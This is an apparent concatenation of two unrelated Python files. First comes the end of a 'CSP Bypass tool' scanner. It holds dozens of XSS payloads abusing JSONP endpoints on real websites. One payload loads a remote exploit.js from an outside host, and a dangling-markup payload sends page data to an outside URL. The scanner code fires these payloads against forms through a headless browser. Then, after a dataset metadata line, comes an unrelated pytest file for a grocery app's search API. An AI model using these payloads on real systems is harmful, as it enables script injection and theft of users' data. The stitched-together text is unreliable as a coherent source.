        {'value': ['https://*.vk.com'], 'patch':[], 'payload': f'"><script src="https://api.vk.com/method/wall.get?callback={general_payload}"></script>'},
        {'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
        {'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
        {'value': ['https://*.alicdn.com'], 'patch':[], 'payload': f'"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback={general_payload}"></script>'},
        {'value': ['https://*.taobao.com'], 'patch':[], 'payload': f'"><script+src="https://suggest.taobao.com/sug?callback={general_payload}"></script>'},
        {'value': ['https://*.tbcdn.cn'], 'patch':[], 'payload': f'"><script+src="https://count.tbcdn.cn//counter3?callback={general_payload}"></script>'},
        {'value': ['https://*.1688.com'], 'patch':[], 'payload': f'"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback={general_payload}"></script>'},
        {'value': ['https://*.amap.com'], 'patch':[], 'payload': f'"><script+src="https://wb.amap.com/channel.php?callback={general_payload}"></script>'},
        {'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback={general_payload};jsonp1"></script>'},
        {'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3b{general_payload}%2f%2f794"></script>'},
        {'value': ['https://*.uber.com'], 'patch':[], 'payload': f'"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback={general_payload};"></script>'},
        {'value': ['https://*.buzzfeed.com'], 'patch':[], 'payload': f'"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback={general_payload}%2f%2f"></script>'},
        {'value': ['https://*.co.jp'], 'patch':[], 'payload': f'"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback={general_payload}//></script>'},
        {'value': ['https://*.yahooapis.jp'], 'patch':[], 'payload': f'"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback={general_payload}//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3b{general_payload}%2f%2f476&_=1537149044679"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback={general_payload};//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback={general_payload};//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>'},
        {'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb={general_payload};"></script>'},
        {'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback={general_payload}"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback={general_payload}//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback={general_payload}//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="http://search.twitter.com/trends.json?callback={general_payload}"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback={general_payload}"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback={general_payload}"></script>'},
        {'value': ['https://*.sharethis.com'], 'patch':[], 'payload': f'"><script+src="https://www.sharethis.com/get-publisher-info.php?callback={general_payload}"></script>'},
        {'value': ['https://*.addthis.com'], 'patch':[], 'payload': f'"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback={general_payload}"></script>'},
        {'value': ['https://*.ngs.ru'], 'patch':[], 'payload': f'"><script+src="https://passport.ngs.ru/ajax/check?callback={general_payload}"></script>'},
        {'value': ['https://*.ulogin.ru'], 'patch':[], 'payload': f'"><script+src="https://ulogin.ru/token.php?callback={general_payload}"></script>'},
        {'value': ['https://*.meteoprog.ua'], 'patch':[], 'payload': f'"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback={general_payload}"></script>'},
        {'value': ['https://*.intuit.com'], 'patch':[], 'payload': f'"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback={general_payload}"></script>'},
        {'value': ['https://*.userlike.com'], 'patch':[], 'payload': f'"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback={general_payload}"></script>'},
        {'value': ['https://*.youku.com'], 'patch':[], 'payload': f'"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback={general_payload}"></script>'},
        {'value': ['https://*.mixpanel.com'], 'patch':[], 'payload': f'"><script+src="https://api.mixpanel.com/track/?callback={general_payload}"></script>'},
        {'value': ['https://*.travelpayouts.com'], 'patch':[], 'payload': f'"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback={general_payload}"></script>'},
        {'value': ['https://*.pictela.net'], 'patch':[], 'payload': f'"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback={general_payload};/json"></script>'},
        {'value': ['https://*.adtechus.com'], 'patch':[], 'payload': f'"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback={general_payload};//window.proper_d31c1edc_57a8d6de_38"></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': '"><embed src=\'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch(e){%s}//\' allowscriptaccess=always>' % general_payload},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'ng-app"ng-csp ng-click=$event.view.{general_payload}><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'<script src=https://www.googleapis.com/customsearch/v1?callback={general_payload}'},
        {'value': ['unsafe-inline', '*'], 'patch':[], 'payload':f"<script>script=document.createElement('script');script.src='//0xhorizon.eu/cspass/exploit.js';window.frames.document.head.appendChild(script);</script>"}
    ]
}
def date_formatted():
    """Return the current local time as an ``HH:MM:SS`` string (log prefix)."""
    return f"{datetime.datetime.now():%H:%M:%S}"
def parse_cookies(arg: str):
    """Parse a command-line cookie string (``k1=v1;k2=v2``) into a dict.

    Each pair is split on the *first* ``=`` only, so values that themselves
    contain ``=`` (e.g. base64 session tokens) are preserved intact — the
    previous ``split("=")`` truncated them. Keys are stripped so inputs like
    ``"a=1; b=2"`` behave as expected.

    :param arg: raw value of the ``-c/--cookies`` option
    :raises argparse.ArgumentTypeError: when a pair contains no ``=``
    :return: dict mapping cookie names to values
    """
    cookies = {}
    for pair in arg.split(";"):
        key, sep, value = pair.partition("=")
        if not sep:
            # No '=' at all in this pair: same error as the original IndexError path.
            raise argparse.ArgumentTypeError("Cookies must be specified with key=value")
        cookies[key.strip()] = value
    return cookies
class Scanner:
    """Top-level driver: holds the scan configuration, discovers pages on the
    target host and provides the colorized console-output helpers."""

    def __init__(self, target, no_colors=False, dynamic=False, all_pages=False, cookies=None, secure=False):
        """Store the scan configuration.

        :param target: base URL to scan
        :param no_colors: strip ANSI color codes from all output
        :param dynamic: verify payloads in a headless browser
        :param all_pages: also scan same-host links found on the target page
        :param cookies: dict of cookies sent with every request
        :param secure: verify TLS certificates on every request
        """
        self.no_colors = no_colors
        self.all_pages = all_pages
        self.dynamic = dynamic
        self.target = target
        self.secure = secure
        self.pages = [self.target]
        # Fix: the old `cookies={}` default was a shared mutable object; give
        # every instance its own dict instead.
        self.cookies = cookies if cookies is not None else {}
        self.sess = HTMLSession()

    def print(self, message=""):
        """Print *message*, stripping ANSI escape sequences when --no-colors is set."""
        if self.no_colors:
            message = re.sub("\x1b[\[]([0-9;]+)m", "", message)
        print(message)

    def succeed(self, message=""):
        """Green SUCCEED-tagged line."""
        self.print(f"[\x1b[92mSUCCEED\x1b[0m] {message}")

    def info(self, message=""):
        """Cyan timestamped info line."""
        self.print(f"[\x1b[96m{date_formatted()}\x1b[0m] {message}")

    def vuln(self, message=""):
        """Yellow VULN-tagged line."""
        self.print(f"[\x1b[93mVULN\x1b[0m] {message}")

    def fail(self, message=""):
        """Magenta FAIL-tagged line."""
        self.print(f"[\x1b[95mFAIL\x1b[0m] {message}")

    def error(self, message=""):
        """Red ERROR-tagged line."""
        self.print(f"[\x1b[91mERROR\x1b[0m] {message}")

    def banner(self):
        """Print the ASCII-art banner in the randomly chosen accent color."""
        self.print(f"""\x1b[{color}m
   ______ _____ ____
  / ____// ___/ / __ \ ____ _ _____ _____
 / /     \__ \ / /_/ // __ `// ___// ___/
/ /___ ___/ // ____// /_/ /(__ )(__ )
\____/ /____//_/ \__,_//____//____/\x1b[0m\x1b[3m by Ruulian\x1b[0m
\x1b[4mVersion\x1b[0m: 1.2
""")

    def ping(self):
        """Return True when the target answers without a transport or HTTP error."""
        try:
            r = self.sess.get(self.target, cookies=self.cookies, verify=self.secure)
            r.raise_for_status()
        except OSError:
            # requests exceptions derive from OSError, so this catches both
            # connection failures and raise_for_status() HTTP errors.
            return False
        return True

    def get_all_pages(self, page):
        """Append every same-host link found on *page* to self.pages.

        Only one level deep: links are collected from *page* itself, the
        discovered pages are not crawled recursively.
        """
        # Fix: honor the --secure/verify flag here like every other request.
        r = self.sess.get(page, cookies=self.cookies, verify=self.secure)
        if r.text != "":
            for link in r.html.absolute_links:
                # Keep only unseen links that stay on the target's host.
                if link not in self.pages and urlparse(link).netloc == urlparse(self.target).netloc:
                    self.pages.append(link)
        # Small delay to avoid hammering the target.
        time.sleep(0.3)
class Page:
    """A single URL under test: fetches and parses its Content-Security-Policy,
    lists its forms, and checks the policy against known bypasses."""

    def __init__(self, url, cookies, secure=False):
        """
        :param url: absolute URL of the page
        :param cookies: cookies sent with every request to the page
        :param secure: verify TLS certificates
        """
        self.url = url
        self.cookies = cookies
        self.secure = secure
        self.sess = HTMLSession()
        self.csp = self.get_csp()
        # Filled by scan(): list of {'value': ..., 'payload': ...} dicts.
        self.vulns = []

    def get_csp(self):
        """Fetch the CSP header and parse it into ``{directive: [values]}``.

        Returns an empty dict when the page sends no Content-Security-Policy.
        """
        data = {}
        # HEAD is enough — we only need the headers. Fix: also send the
        # session cookies, for consistency with every other request here.
        r = self.sess.head(self.url, cookies=self.cookies, verify=self.secure)
        if 'Content-Security-Policy' in r.headers.keys():
            csp = r.headers['Content-Security-Policy']
            for param in csp.strip().strip(';').split(';'):
                matched = re.search("^([a-zA-Z0-9\-]+)( .*)?$", param.strip())
                if matched is None:
                    # Fix: skip empty/malformed directives (e.g. from ";;"),
                    # which previously crashed with AttributeError.
                    continue
                csp_name, csp_values = matched.groups()
                if csp_values is not None:
                    # Drop the single quotes CSP keywords carry ('self', 'unsafe-inline', ...).
                    csp_values = [v.rstrip("'").lstrip("'") for v in csp_values.strip().split(' ')]
                else:
                    csp_values = []
                data[csp_name] = csp_values
        return data

    def format_csp(self):
        """Pretty-print the parsed CSP as indented JSON with space-joined values."""
        csp = {name: " ".join(values) for name, values in self.csp.items()}
        return json.dumps(csp, indent=4)

    def get_forms(self):
        """Return the page's <form> elements (empty list when the body is empty)."""
        # Fix: honor the --secure/verify flag like the other requests.
        r = self.sess.get(self.url, cookies=self.cookies, verify=self.secure)
        if r.text != "":
            return r.html.find("form")
        return []

    def test_patch(self, patches):
        """Return True when any ``(directive, regex)`` mitigation matches the CSP.

        Used to detect nonces/hashes that neutralize an otherwise-vulnerable
        directive value.
        """
        for patch_policy_name, patch_policy_value in patches:
            if patch_policy_name in self.csp:
                pattern = re.compile(patch_policy_value)
                if any(pattern.match(value) for value in self.csp[patch_policy_name]):
                    return True
        return False

    def scan(self):
        """Compare the parsed CSP against known-bypassable configurations.

        Appends each finding to ``self.vulns`` and returns True when at least
        one exploitable directive/value combination was found.
        """
        vuln = False
        csp_keys = self.csp.keys()
        new_csp_keys = []
        # Resolve fallbacks: if script-src is absent, default-src governs scripts.
        for policy, fallback in policies_fallback.items():
            if fallback in csp_keys and policy not in csp_keys:
                new_csp_keys.append((policy, fallback))
            else:
                new_csp_keys.append((policy, policy))
        for priority, name in new_csp_keys:
            if name not in self.csp:
                # Fix: neither the directive nor its fallback is declared —
                # previously this raised KeyError below.
                continue
            if priority in vulnerable_CSP_conf.keys():
                for exploit in vulnerable_CSP_conf[priority]:
                    # Exploitable when every required value is present and no
                    # listed mitigation (nonce/hash) patches it.
                    if all(x in self.csp[name] for x in exploit['value']) and (exploit['patch'] == [] or not self.test_patch(exploit['patch'])):
                        policyvalue = " ".join(self.csp[name])
                        self.vulns.append({'value': f"{name} {policyvalue}", 'payload': exploit['payload']})
                        vuln = True
        return vuln
class Form:
    """One HTML form on a scanned page, with helpers to test input reflection
    and to fire payloads through a headless browser."""

    def __init__(self, url, action, method, names, cookies, secure=False):
        """
        :param url: page the form lives on
        :param action: absolute submission URL of the form
        :param method: HTTP method declared by the form (GET/POST)
        :param names: ``{input_name: preset_value}`` map ('' means fillable)
        :param cookies: cookies to send / inject into the browser
        :param secure: verify TLS certificates
        """
        self.url = url
        self.action = action
        self.method = method
        self.names = names
        self.cookies = cookies
        self.secure = secure
        self.sess = HTMLSession()

    def test_dom(self):
        """Submit a marker value through the form and report whether it comes
        back reflected *unescaped* in the response body."""
        value = "<em>random_value_t0_test</em>"
        # Fill every free input with the marker; keep preset (hidden) values.
        parameters = {name: value if preset == "" else preset
                      for name, preset in self.names.items()}
        method = self.method.lower()
        if method == "get":
            r = self.sess.get(self.action, params=parameters, cookies=self.cookies, verify=self.secure)
        elif method == "post":
            r = self.sess.post(self.action, data=parameters, cookies=self.cookies, verify=self.secure)
        else:
            # Fix: unsupported form methods previously crashed on an unbound
            # local `r`; treat them as "not reflectable" instead.
            return False
        return value in r.text

    def exploit(self, payload, dangling=False):
        """Drive a headless Firefox through the form with *payload*.

        Returns True when the payload fired: an alert() popup for XSS
        payloads, or an off-site navigation when *dangling* is True
        (dangling-markup check).
        """
        domain = urlparse(self.url).netloc
        # Discard the geckodriver log on every platform.
        if platform.system() == "Linux" or platform.system() == "Darwin":
            log_path = "/dev/null"
        else:
            log_path = "NUL"
        options = FirefoxOptions()
        options.add_argument("--headless")
        # NOTE(review): find_element_by_* is the Selenium 3 API (removed in
        # Selenium 4) — kept because the rest of the file targets Selenium 3.
        wb = webdriver.Firefox(options=options, service_log_path=log_path)
        try:
            wb.get(self.url)
            for key, value in self.cookies.items():
                wb.add_cookie({'name': key, 'value': value, 'domain': domain})
            for name in self.names:
                form_input = wb.find_element_by_name(name)
                form_input.clear()
                form_input.send_keys(payload)
            form = wb.find_element_by_tag_name("form")
            form.submit()
            time.sleep(0.5)
            if dangling:
                # Success means the injected markup dragged the browser off-host.
                exploit = urlparse(wb.current_url).netloc != domain
            else:
                try:
                    WebDriverWait(wb, 3).until(EC.alert_is_present())
                    wb.switch_to.alert.accept()
                    exploit = True
                except TimeoutException:
                    exploit = False
        finally:
            # Fix: quit() (not close()) also terminates the geckodriver
            # process; close() leaked one driver process per call, and any
            # exception above previously leaked the whole browser.
            wb.quit()
        return exploit
def parse_args():
    """Declare and parse the tool's command-line interface."""
    parser = argparse.ArgumentParser(add_help=True, description='CSP Bypass tool')
    parser.add_argument("--no-colors", dest="no_colors", action="store_true", help="Disable color mode")
    parser.add_argument("-d", "--dynamic", dest="dynamic", action="store_true", help="Use dynamic mode")
    parser.add_argument("-a", "--all-pages", dest="all_pages", action="store_true", help="Looking for vulnerability in all pages could be found", required=False)
    parser.add_argument("-k", "--secure", dest="secure", action="store_true", help="Check SSL certificate")
    target_group = parser.add_argument_group("Required argument")
    target_group.add_argument("-t", "--target", dest="target", help="Specify the target url", required=True)
    auth_group = parser.add_argument_group("Authentication")
    auth_group.add_argument("-c", "--cookies", dest="cookies", help="Specify the cookies (key=value)", type=parse_cookies, required=False, default={})
    return parser.parse_args()
# ---- Command-line entry point: orchestrates the whole scan ----
if __name__ == '__main__':
    args = parse_args()
    scan = Scanner(target=args.target, no_colors=args.no_colors, dynamic=args.dynamic, all_pages=args.all_pages, cookies=args.cookies, secure=args.secure)
    scan.banner()
    scan.info(f"Starting scan on target \x1b[1m{scan.target}\x1b[0m\n")
    # Abort early when the target is unreachable.
    scan.info("Pinging page")
    if scan.ping():
        scan.info("Page found\n")
    else:
        scan.error("Page not found")
        exit()
    # Optionally widen the scope to same-host links found on the target page.
    if scan.all_pages:
        scan.info("Detecting all pages...")
        scan.get_all_pages(scan.target)
        scan.info(f"{len(scan.pages)} pages found\n")
    for p in scan.pages:
        page = Page(p, scan.cookies, secure=scan.secure)
        scan.info(f"Scanning page: \x1b[1m{page.url}\x1b[0m")
        forms = page.get_forms()
        if forms != []:
            for form in forms:
                # Resolve the form's submission target; default to the page itself.
                if 'action' in form.attrs and form.attrs['action'] != '':
                    action = form.attrs['action']
                else:
                    action = page.url
                if 'method' in form.attrs:
                    method = form.attrs['method']
                else:
                    method = "GET"
                # Collect input names, preserving preset values of hidden fields.
                inputs = form.find("input") + form.find("textarea")
                names = {}
                for input_tag in inputs:
                    if "name" in input_tag.attrs:
                        name = input_tag.attrs["name"]
                        if "type" in input_tag.attrs and input_tag.attrs["type"] == "hidden":
                            try:
                                names[name] = input_tag.attrs["value"]
                            except:
                                pass
                        else:
                            names[name] = ''
                new_form = Form(page.url, urljoin(page.url, action), method, names, scan.cookies, scan.secure)
                # Only analyze the CSP when the form reflects input unescaped.
                if new_form.test_dom():
                    scan.info("Parameter reflected in DOM and no htmlspecialchars detected")
                    if page.csp != {}:
                        csps = page.format_csp()
                        scan.print()
                        scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
                        scan.print(csps)
                        scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
                        scan.print()
                        if page.scan():
                            vulns = page.vulns
                            scan.info(f"Number of vulnerabilities found: {len(vulns)}\n")
                            for vuln in vulns:
                                scan.vuln(f"Vulnerability: \x1b[1m{vuln['value']}\x1b[0m")
                                scan.vuln(f"Payload: {vuln['payload']}\n")
                            # Dynamic mode: fire each candidate payload in a headless browser.
                            if scan.dynamic:
                                scan.info(f"Starting dynamic mode ...")
                                for vuln in vulns:
                                    scan.info(f"Testing: \x1b[1m{vuln['value']}\x1b[0m")
                                    if new_form.exploit(vuln['payload']):
                                        scan.succeed(f"Payload found on \x1b[1m{page.url}\x1b[0m")
                                        scan.succeed(f"Payload: {vuln['payload']}\n")
                                    else:
                                        scan.fail("Payload tested didn't work\n")
                        else:
                            scan.fail(f"No XSS found\n")
                            # No scriptable bypass: fall back to a dangling-markup attempt.
                            if scan.dynamic:
                                scan.info("Testing Dangling Markup ...")
                                dangling_markup_payload = "<meta http-equiv=\"refresh\" content='0; url=https://0xhorizon.eu?data="
                                if new_form.exploit(dangling_markup_payload, True):
                                    scan.succeed(f"Dangling markup payload found: {dangling_markup_payload}\n")
                                else:
                                    scan.fail("No dangling markup detected\n")
                            else:
                                scan.info("Perhaps you can exploit Dangling Markup\n")
                    else:
                        scan.fail(f"No CSP on page {page.url}\n")
                else:
                    scan.fail("No parameter reflected in DOM or htmlspecialchars detected\n")
        else:
            scan.fail("No form found on this page\n")
    scan.info("Scan finished")
d32ea4782a875805c450b276ed30f51fc7a8a52c | 4,079 | py | Python | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | null | null | null | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | 18 | 2019-02-09T21:59:15.000Z | 2019-03-10T19:13:19.000Z | backend/tests/test_search.py | Davidw1339/GroceryBuddy | 6e2fde00999b4b9e218a919d793ee10128212ea8 | [
"Apache-2.0"
] | 2 | 2019-02-12T17:12:22.000Z | 2019-02-25T05:41:31.000Z | import json
import search
import test_data
import copy
from utils import Error
def test_no_args(client):
    """Searching without any query parameters fails with the missing-keyword error."""
    body = json.loads(client.get('/search').data)
    assert body == {'success': False,
                    'error': Error.MISSING_KEYWORD_UPC.value}
def test_extra_args(client):
    """Unknown argument names are ignored, so the request fails as if empty."""
    rv = client.get('/search', data=json.dumps({'extra': 'peilun'}))
    body = json.loads(rv.data)
    assert body == {'success': False,
                    'error': Error.MISSING_KEYWORD_UPC.value}
def test_search_by_upc(client, existing_item):
    """Looking an item up by its UPC returns that item first."""
    upc = str(existing_item.upc)
    results = json.loads(client.get('/search?upc=' + upc).data)
    assert results[0]['upc'] == upc
def test_search_by_keyword_lower(client, existing_item):
    """A fully lowercase keyword still matches the item."""
    upc = str(existing_item.upc)
    query = str(existing_item.name).lower()
    results = json.loads(client.get('/search?keyword=' + query).data)
    assert results[0]['upc'] == upc
def test_search_by_keyword_upper(client, existing_item):
    """A fully uppercase keyword still matches the item."""
    upc = str(existing_item.upc)
    query = str(existing_item.name).upper()
    results = json.loads(client.get('/search?keyword=' + query).data)
    assert results[0]['upc'] == upc
def test_search_by_keyword_mixed(client, existing_item):
    """Keyword matching is case-insensitive even for mixed-case queries."""
    upc = str(existing_item.upc)
    lowered = str(existing_item.name).lower()
    # Uppercase the first half of the name, keep the second half lowercase.
    half = len(lowered) // 2
    query = lowered[:half].upper() + lowered[half:]
    results = json.loads(client.get('/search?keyword=' + query).data)
    assert results[0]['upc'] == upc
def test_search_by_keyword_partial(client, existing_item):
    """A prefix of the item name is enough to find it."""
    upc = str(existing_item.upc)
    full_name = str(existing_item.name).lower()
    prefix = full_name[:len(full_name) // 2]
    results = json.loads(client.get('/search?keyword=' + prefix).data)
    assert results[0]['upc'] == upc
def test_search_upc_over_keyword(client):
    """When both upc and keyword are supplied, the UPC takes priority."""
    first_item = copy.deepcopy(test_data.valid_items[0])
    first_item.save()
    second_item = copy.deepcopy(test_data.valid_items[1])
    second_item.save()
    first_upc, first_name = first_item.upc, first_item.name
    second_upc, second_name = second_item.upc, second_item.name
    # Sanity: the two fixtures must not collide on UPC or name.
    assert first_upc != second_upc
    assert first_name not in second_name and second_name not in first_name
    # Query with one item's UPC but the *other* item's name as keyword.
    results = json.loads(
        client.get(f'/search?upc={first_upc}&keyword={second_name}').data)
    assert results[0]['upc'] == first_upc
def test_invalid_limit(client, existing_item):
    """A result limit of 0 is rejected with the invalid-limit error."""
    keyword = str(existing_item.name).lower()
    body = json.loads(client.get('/search?keyword=' + keyword + '&limit=0').data)
    assert body == {'success': False,
                    'error': Error.INVALID_LIMIT.value}
def test_limit(client, db):
    """The limit parameter caps the number of results, best match first."""
    keyword = 'test'
    limit = 1
    # Persist every fixture whose name contains the keyword and remember it.
    matches = []
    for item in test_data.valid_items:
        if keyword in item.name:
            copy.deepcopy(item).save()
            matches.append(item)
    matches.sort(key=lambda item: item.upc)
    results = json.loads(
        client.get('/search?keyword=' + keyword + '&limit=' + str(limit)).data)
    assert len(results) == limit
    assert results[0]['upc'] == matches[0].upc
| 25.335404 | 74 | 0.634714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 914 | 0.224075 |